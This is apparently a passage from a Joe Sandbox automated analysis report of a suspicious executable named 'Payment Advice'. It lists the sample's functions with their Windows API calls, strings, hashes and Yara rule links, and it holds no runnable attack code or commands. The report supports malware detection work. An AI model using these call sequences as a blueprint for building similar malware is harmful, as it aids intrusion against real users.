Opcode Fuzzy Hash: 8d06c3219d65cd579acc9aed40df35e7297adb24b420b27ed2780a95c62a242d
Instruction Fuzzy Hash: DE315E31900205EBDF109FA5DC89EABBB79FF85310B1481A9F905AB246D774DA10DBA0

Function 005D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,005D77F4,?,?,00000000,00000001), ref: 005D9B53

Part of subcall function 005D6544: GetWindowRect.USER32(?,?), ref: 005D6557

GetDesktopWindow.USER32 ref: 005D9B7D
GetWindowRect.USER32(00000000), ref: 005D9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005D9BB6

Part of subcall function 005C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C7AD0

GetCursorPos.USER32(?), ref: 005D9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005D9C44

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ef4e14f32ab3d9b0d74acad9c96b2fa7c03dbe1e5f30b2771972d7ad7769d11f
Instruction ID: bb6445d5b66251411c2d016eb9109263d4dd939e53af407ab1434866af6b4553
Opcode Fuzzy Hash: ef4e14f32ab3d9b0d74acad9c96b2fa7c03dbe1e5f30b2771972d7ad7769d11f
Instruction Fuzzy Hash: 3E31B07214830AABD720DF589C49F9BBBE9FF88314F000A1BF585E7291D671E9048B91

Function 005BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005BAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 005BAFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005BAFC4
CloseHandle.KERNEL32(00000004), ref: 005BAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005BAFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 005BB012

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: eca3c59cba1ca7d1d5b1cfaa332d08829f07b4ad5c405e04dd00f2244cb2909f
Instruction ID: a0b0a1ed884aacb49697ed90b653eec17eb4ba9bec0cf696b5f88477f5ab93de
Opcode Fuzzy Hash: eca3c59cba1ca7d1d5b1cfaa332d08829f07b4ad5c405e04dd00f2244cb2909f
Instruction Fuzzy Hash: 722149B214420DABDB029FA4DD09BEE7FAABB44304F144115FA01A2161D376ED21EB61

Function 005EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0059AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0059AFE3
Part of subcall function 0059AF83: SelectObject.GDI32(?,00000000), ref: 0059AFF2
Part of subcall function 0059AF83: BeginPath.GDI32(?), ref: 0059B009
Part of subcall function 0059AF83: SelectObject.GDI32(?,00000000), ref: 0059B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 005EEC20
LineTo.GDI32(00000000,00000003,?), ref: 005EEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 005EEC42
LineTo.GDI32(00000000,00000000,?), ref: 005EEC52
EndPath.GDI32(00000000), ref: 005EEC62
StrokePath.GDI32(00000000), ref: 005EEC72

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 9fba70f8204447ac88c79ab12ec28978573f749da738addd1903380c88278410
Instruction ID: 36f9ffa7c50078629a3d67b6d14fe256d1e8d083b54ea2902ffcfad03349f37b
Opcode Fuzzy Hash: 9fba70f8204447ac88c79ab12ec28978573f749da738addd1903380c88278410
Instruction Fuzzy Hash: D7111B7604014DBFEF029F90DC88EEB7F6EEB09354F048112BE0989160D7719E95DBA0

Function 005BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005BE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 005BE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005BE1D8
ReleaseDC.USER32(00000000,00000000), ref: 005BE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 005BE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 005BE209

Part of subcall function 005B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,005B9A05,00000000,00000000,?,005B9DDB), ref: 005BA53A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 5ca07a35d25dfc5afa2141e7733a5ad181200c7fa19e67b943fb113b04a50d55
Instruction ID: cbc68433a47d89fba2e85ef4a1a8d849c4ea8ddba85bf2a4eb44b76f3710ab7b
Opcode Fuzzy Hash: 5ca07a35d25dfc5afa2141e7733a5ad181200c7fa19e67b943fb113b04a50d55
Instruction Fuzzy Hash: E80184B5A40315BFEB109FE58C46B9FBFB9EB48351F044166EA04A7290D6719C00CBA0

Function 005827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0058281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00582825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00582830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0058283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00582843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0058284B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6633ead263b2e91a3d83186e78ec9e830c207a51e8f0a64186bf0bfb662ea181
Instruction ID: 14bf55bd8bdb72191e97a385d66c1b972f210ebf2cf9e6e90d933b42be6ca99b
Opcode Fuzzy Hash: 6633ead263b2e91a3d83186e78ec9e830c207a51e8f0a64186bf0bfb662ea181
Instruction Fuzzy Hash: B80167B0942B5ABDE3008F6A8C85B53FFA8FF19354F00421BA15C47A42C7F5A864CBE5

Function 005C9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 02fe634d36dc1c56ae243e92b3828412d290ba9fbf198749e8fbdafb8d8c4621
Instruction ID: 4c41e2a71b38263e076fe81fd0479e135727e818c67dadcdcf31268b3622e166
Opcode Fuzzy Hash: 02fe634d36dc1c56ae243e92b3828412d290ba9fbf198749e8fbdafb8d8c4621
Instruction Fuzzy Hash: 46018136182612AFD7191BD4EC4CEEB7B6AFF88701B04162DF603920A4DB74A900DB50

Function 005C7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005C7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005C7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 005C7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C7C4C

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 3b2a1341bff8fad04f82b546642091390ccf3b65ea3e59e53917f796073782bf
Instruction ID: 0cbe8f6aedfabba97326475e9a7d2d416978bc124073fb12c2243e1d821f1d47
Opcode Fuzzy Hash: 3b2a1341bff8fad04f82b546642091390ccf3b65ea3e59e53917f796073782bf
Instruction Fuzzy Hash: 26F03A72281158BBE7215B929C0EEEF7F7DEFCAB11F001258FA0192091DBA15A41D6B5

Function 005C9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 005C9A33
EnterCriticalSection.KERNEL32(?,?,?,?,005F5DEE,?,?,?,?,?,0058ED63), ref: 005C9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,005F5DEE,?,?,?,?,?,0058ED63), ref: 005C9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,005F5DEE,?,?,?,?,?,0058ED63), ref: 005C9A5E

Part of subcall function 005C93D1: CloseHandle.KERNEL32(?,?,005C9A6B,?,?,?,005F5DEE,?,?,?,?,?,0058ED63), ref: 005C93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 005C9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,005F5DEE,?,?,?,?,?,0058ED63), ref: 005C9A78

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3098d034541a1adfdc2265844fdb120b02649e57997bd89027b711c05db26a90
Instruction ID: acc5e3a5a4f3d1d83183c69f96374b83821c2c4f54e21d0ad78d59fac55aae12
Opcode Fuzzy Hash: 3098d034541a1adfdc2265844fdb120b02649e57997bd89027b711c05db26a90
Instruction Fuzzy Hash: 7CF05E36181211AFD7151BE4EC8DEAB7B3BFF89701B141625F603910A8DB759A11DB50

Function 00581CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0059F4EA: std::exception::exception.LIBCMT ref: 0059F51E
Part of subcall function 0059F4EA: __CxxThrowException@8.LIBCMT ref: 0059F533

__swprintf.LIBCMT ref: 00581EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00581D49

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: a1138ef3be8ee262b756d72a8fae9c8bbcc63c399684adf749e69033de76cc7f
Instruction ID: c05c22cc5143516efd9c826ded1411f6c0312b3e722ccb9f0b3f5b107ff4b140
Opcode Fuzzy Hash: a1138ef3be8ee262b756d72a8fae9c8bbcc63c399684adf749e69033de76cc7f
Instruction Fuzzy Hash: E3914A715046069FCB24FF24C99AC6EBFA8BFD5700F044929F995A72A1DB30ED05CB92

Function 005DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005DB006
CharUpperBuffW.USER32(?,?), ref: 005DB115
VariantClear.OLEAUT32(?), ref: 005DB298

Part of subcall function 005C9DC5: VariantInit.OLEAUT32(00000000), ref: 005C9E05
Part of subcall function 005C9DC5: VariantCopy.OLEAUT32(?,?), ref: 005C9E0E
Part of subcall function 005C9DC5: VariantClear.OLEAUT32(?), ref: 005C9E1A

Strings

Incorrect Parameter format, xrefs: 005DB03E, 005DB20B
AUTOIT.ERROR, xrefs: 005DB11B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f70a41fac85fd67697c00d80f7048fe6b2bde9037c33760c24f5c4723efca4bd
Instruction ID: ac03a66c2c2130a24788d1724fb5c6f4bdac3b5df20c57940252ae0c993a9f64
Opcode Fuzzy Hash: f70a41fac85fd67697c00d80f7048fe6b2bde9037c33760c24f5c4723efca4bd
Instruction Fuzzy Hash: C7914A75604302DFCB20EF68C48995ABBE5BFC9704F04486EF89A9B361DB31E945CB52

Function 005C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059C6F4: _wcscpy.LIBCMT ref: 0059C717

_memset.LIBCMT ref: 005C5438
GetMenuItemInfoW.USER32(?), ref: 005C5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005C5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005C553D

Strings

0, xrefs: 005C5430

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: b016a03a2ffb538b727bd3288339cf58519c9ab76d26c152dae704b26d995387
Instruction ID: 1cce8b7e44f1b665ff1488c034fc2d67188feb4ac6824ab8436b0112a4bab755
Opcode Fuzzy Hash: b016a03a2ffb538b727bd3288339cf58519c9ab76d26c152dae704b26d995387
Instruction Fuzzy Hash: 4251FF311047029FD7159EE8C885B6BBEE9FB96760F040A2DF895D2190EBA0ED808B52

Function 005C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005C027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005C02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005C02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005C0344

Strings

DllGetClassObject, xrefs: 005C02B7

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 2875932264cc9f812ce9801fc5fc37a32259235025487a63ccc2f71ba4c31dd3
Instruction ID: e3ba0946fd6e9390c40b59db7103e3fbd3424e40a5d6369f9d65c50a1c853d8b
Opcode Fuzzy Hash: 2875932264cc9f812ce9801fc5fc37a32259235025487a63ccc2f71ba4c31dd3
Instruction Fuzzy Hash: 3F416B71604205EFDB05CF94C884F9A7FB9FF84710F1499ADA9099F286D7B1D944CBA0

Function 005C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C5075
GetMenuItemInfoW.USER32 ref: 005C5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 005C50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00641708,00000000), ref: 005C5120

Strings

0, xrefs: 005C506D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: d9b5c00afece846ca99b0c6c2fbfede2e132c5557356da43beb672a79dfcb114
Instruction ID: 3dd058d0b5a51e1ecca52d1cff71435535d0405e4ee99cfbf116ebe074e14519
Opcode Fuzzy Hash: d9b5c00afece846ca99b0c6c2fbfede2e132c5557356da43beb672a79dfcb114
Instruction Fuzzy Hash: 974191712047029FD711DFA4D889F6ABBE4BF85314F144A1EF99597291E730E940CB62

Function 005E0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 005E0587

Strings

stdcall, xrefs: 005E0609
none, xrefs: 005E0662
winapi, xrefs: 005E05F8
cdecl, xrefs: 005E05DE

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 8f5e31a09c74a22a4e268473c6d00df225875e418ebc43a246e9b9824624a7d4
Instruction ID: 1ff856ef7f69110ef61afd4f13b5d693746fd3f756446a664a05c54d831a4f3c
Opcode Fuzzy Hash: 8f5e31a09c74a22a4e268473c6d00df225875e418ebc43a246e9b9824624a7d4
Instruction Fuzzy Hash: D831D230500657AFCF04EF64C841AAEBBB5FF95314B008629E866A73D1DB71E945CB90

Function 005BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005BB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005BB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 005BB8D1

Strings

ComboBox, xrefs: 005BB815
ListBox, xrefs: 005BB84D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: b23e37aba45e493767b8dddd73fd41c57a96112f9fe86dac883d2bc1e9406c5c
Instruction ID: 806146367594c92ec4bd59eacb927e94ea90a2ffbe1b6f208c6fd2127813682f
Opcode Fuzzy Hash: b23e37aba45e493767b8dddd73fd41c57a96112f9fe86dac883d2bc1e9406c5c
Instruction Fuzzy Hash: FD210176900109BFEB04ABA4C88ADFE7FBDFF85350F104529F421A61E1DBB46D069760

Function 005D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005D4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005D4457
InternetCloseHandle.WININET(00000000), ref: 005D449E

Part of subcall function 005D5052: GetLastError.KERNEL32(?,?,005D43CC,00000000,00000000,00000001), ref: 005D5067

Strings

, xrefs: 005D4450

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 94b60844ed4ab274b30745ad8f3cbe03d1b2342b89c42c4be52bec859092b75b
Instruction ID: d69fbe8747cb006a4fd92b3506abb2b2a142f2f27086e32d10e2d73b072e1970
Opcode Fuzzy Hash: 94b60844ed4ab274b30745ad8f3cbe03d1b2342b89c42c4be52bec859092b75b
Instruction Fuzzy Hash: F52180B1540208BFEB219F98CC89EBFBBEDFB88748F10851BF10596240EA748D459B71

Function 005E90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

